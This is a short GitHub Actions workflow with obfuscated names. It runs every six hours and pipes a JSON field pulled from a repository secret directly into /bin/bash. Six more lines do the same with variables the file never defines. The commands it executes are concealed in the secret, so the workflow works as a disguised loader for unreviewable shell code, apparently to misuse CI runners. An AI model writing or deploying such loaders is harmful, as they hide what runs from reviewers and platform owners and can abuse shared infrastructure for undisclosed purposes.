name: muhong19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '54 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: muhong19871010
        env:
          fyap240: ${{ secrets.fyap240 }}
        run: |
          echo $fyap240 | jq -r .kr95 | /bin/bash
          echo $n3 | jq -r .vobe22566 | /bin/bash
          echo $uhe27 | jq -r .nit02543 | /bin/bash
          echo $mptr0680 | jq -r .wa15 | /bin/bash
          echo $ccncs580 | jq -r .ksyjl9253 | /bin/bash
          echo $g4880 | jq -r .s619 | /bin/bash
          echo $osyv48786 | jq -r .eqyse874 | /bin/bash

